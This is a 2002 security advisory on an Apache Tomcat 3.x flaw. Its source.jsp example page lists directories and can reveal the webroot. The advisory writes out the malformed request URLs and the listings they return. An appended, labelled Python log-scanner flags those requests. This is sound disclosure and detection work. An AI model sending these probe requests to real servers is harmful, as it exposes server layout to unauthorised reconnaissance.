 
From: webmasterprocheckup.com
Date: Wed May 29 2002 - 08:31:27 CDT


    Procheckup Ltd
    www.procheckup.com

    Procheckup Security Bulletin PR02-05

               
      Description: Tomcat source.jsp directory listing and webroot
                   location display
             Date: 8/1/2002

      Application: Apache Tomcat Java server versions 3.23 and 3.24
         Platform: Linux/Unix
         Severity: Remote attackers can obtain listings of web
                   directories and sometimes the location of webroot
          Authors: Richard Brain [richard.brainprocheckup.com]
    Vendor Status:
    CVE Candidate: Not assigned
        Reference: www.procheckup.com/security_info/vuln.html


     Description:

    Tomcat is the free open source Java server,
    http://jakarta.apache.org/tomcat/.

    Normally source.jsp is used to look at the source code of
    programs within the examples directories. A typical
    request is

    http://webserver:80/examples/jsp/source.jsp?/jsp/num/numguess.jsp

    We have found that when source.jsp is given malformed input,
    a directory listing is displayed and the location of the
    webroot is sometimes disclosed.

    The vulnerabilities may only work on port 8080 rather than
    port 80, dependent on how the webserver has been configured
    with Tomcat.

    Exploits

    A) Requesting the following url :-

    http://webserver:80/examples/jsp/source.jsp??

    Gives the directory listing and webroot on 3.23; 3.24 just
    gives a directory listing.

    <title>Directory Listing</title>
    <base href="file://localhost/"WEBROOT"/webapps/examples/">
    <h1>/"WEBROOT"/webapps/examples</h1>
    <hr>
    <img align=middle src="doc:/lib/images/ftp/directory.gif" width=32 height=32> <a href="images">images</a><br>
    <img align=middle src="doc:/lib/images/ftp/directory.gif" width=32 height=32> <a href="jsp">jsp</a><br>
    <img align=middle src="doc:/lib/images/ftp/directory.gif" width=32 height=32> <a href="META-INF">META-INF</a><br>
    <img align=middle src="doc:/lib/images/ftp/directory.gif" width=32 height=32> <a href="servlets">servlets</a><br>
    <img align=middle src="doc:/lib/images/ftp/directory.gif" width=32 height=32> <a href="WEB-INF">WEB-INF</a><br>

    B) Requesting the following url :-

    http://webserver:80/examples/jsp/source.jsp?/jsp/

    Gives the directory listing and webroot on 3.23; 3.24 just
    gives a directory listing of a subdirectory.

    <title>Directory Listing</title>
    <base href="file://localhost/"WEBROOT"/webapps/examples/jsp/">
    <h1>/"WEBROOT"/webapps/examples/jsp</h1>
    <hr>
    <img align=middle src="doc:/lib/images/ftp/directory.gif" width=32 height=32> <a href="cal">cal</a><br>
    <img align=middle src="doc:/lib/images/ftp/directory.gif" width=32 height=32> <a href="checkbox">checkbox</a><br>
    <img align=middle src="doc:/lib/images/ftp/directory.gif" width=32 height=32> <a href="colors">colors</a><br>
    <img align=middle src="doc:/lib/images/ftp/directory.gif" width=32 height=32> <a href="dates">dates</a><br>
    <img align=middle src="doc:/lib/images/ftp/directory.gif" width=32 height=32> <a href="error">error</a><br>
    <img align=middle src="doc:/lib/images/ftp/directory.gif" width=32 height=32> <a href="forward">forward</a><br>
    <img align=middle src="doc:/lib/images/ftp/directory.gif" width=32 height=32> <a href="include">include</a><br>
    <img align=middle src="doc:/lib/images/ftp/file.gif" width=32 height=32> <a href="index.html">index.html</a><br>
    <img align=middle src="doc:/lib/images/ftp/directory.gif" width=32 height=32> <a href="jsptoserv">jsptoserv</a><br>
    <img align=middle src="doc:/lib/images/ftp/directory.gif" width=32 height=32> <a href="num">num</a><br>
    <img align=middle src="doc:/lib/images/ftp/directory.gif" width=32 height=32> <a href="plugin">plugin</a><br>
    <img align=middle src="doc:/lib/images/ftp/directory.gif" width=32 height=32> <a href="security">security</a><br>
    <img align=middle src="doc:/lib/images/ftp/directory.gif" width=32 height=32> <a href="sessions">sessions</a><br>
    <img align=middle src="doc:/lib/images/ftp/directory.gif" width=32 height=32> <a href="simpletag">simpletag</a><br>
    <img align=middle src="doc:/lib/images/ftp/directory.gif" width=32 height=32> <a href="snp">snp</a><br>
    <img align=middle src="doc:/lib/images/ftp/file.gif" width=32 height=32> <a href="source.jsp">source.jsp</a><br>

       Solution:
      Delete the samples directory if not needed.
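
Where the examples cannot be removed straight away, access logs can be reviewed for source.jsp requests whose argument is not a file path. The script below is an added example and not part of the Procheckup bulletin. It assumes Common Log Format, uses constructed sample lines, and its heuristic (argument empty, only "?", or ending in "/") generalises the two requests shown above.

```python
import re

# Constructed access-log lines in Common Log Format (not from the bulletin).
SAMPLE_LOG = """\
192.0.2.10 - - [29/May/2002:08:31:27 -0500] "GET /examples/jsp/source.jsp?/jsp/num/numguess.jsp HTTP/1.0" 200 1843
192.0.2.77 - - [29/May/2002:08:32:02 -0500] "GET /examples/jsp/source.jsp?? HTTP/1.0" 200 912
192.0.2.77 - - [29/May/2002:08:32:09 -0500] "GET /examples/jsp/source.jsp?/jsp/ HTTP/1.0" 200 2710
192.0.2.10 - - [29/May/2002:08:33:40 -0500] "GET /index.html HTTP/1.0" 200 512
"""

# client, identd, user, [timestamp], "METHOD target PROTOCOL", status
REQUEST_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]*\] "(\S+) (\S+)[^"]*" (\d{3}) ')
SOURCE_JSP = "/examples/jsp/source.jsp"  # path used in the bulletin's URLs


def classify_query(query):
    """Return a reason if the source.jsp argument is not a file path, else None."""
    if query is None or query == "":
        return "no file argument"
    if query.strip("?") == "":
        return "argument is only '?'"
    if query.endswith("/"):
        return "argument names a directory"
    return None


def find_suspicious(log_text):
    """Return (client, target, status, reason) for each flagged source.jsp request."""
    hits = []
    for line in log_text.splitlines():
        m = REQUEST_RE.match(line)
        if not m:
            continue  # not a parseable Common Log Format line
        client, _method, target, status = m.groups()
        path, sep, query = target.partition("?")
        if path != SOURCE_JSP:
            continue
        reason = classify_query(query if sep else None)
        if reason:
            hits.append((client, target, int(status), reason))
    return hits


if __name__ == "__main__":
    for hit in find_suspicious(SAMPLE_LOG):
        print(hit)
```

A flagged request answered with status 200 is worth checking against the response body for the "Directory Listing" title shown in the bulletin.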

          Legal:

      Copyright 2002 Procheckup Ltd. All rights reserved.

      Permission is granted for copying and circulating this
      Bulletin to the Internet community for the purpose of
      alerting them to problems, if and only if, the Bulletin is
      not edited or changed in any way, is attributed to
      Procheckup, and provided such reproduction and/or
      distribution is performed for non-commercial purposes.

      Any other use of this information is prohibited.
      Procheckup is not liable for any misuse of this
      information by any third party.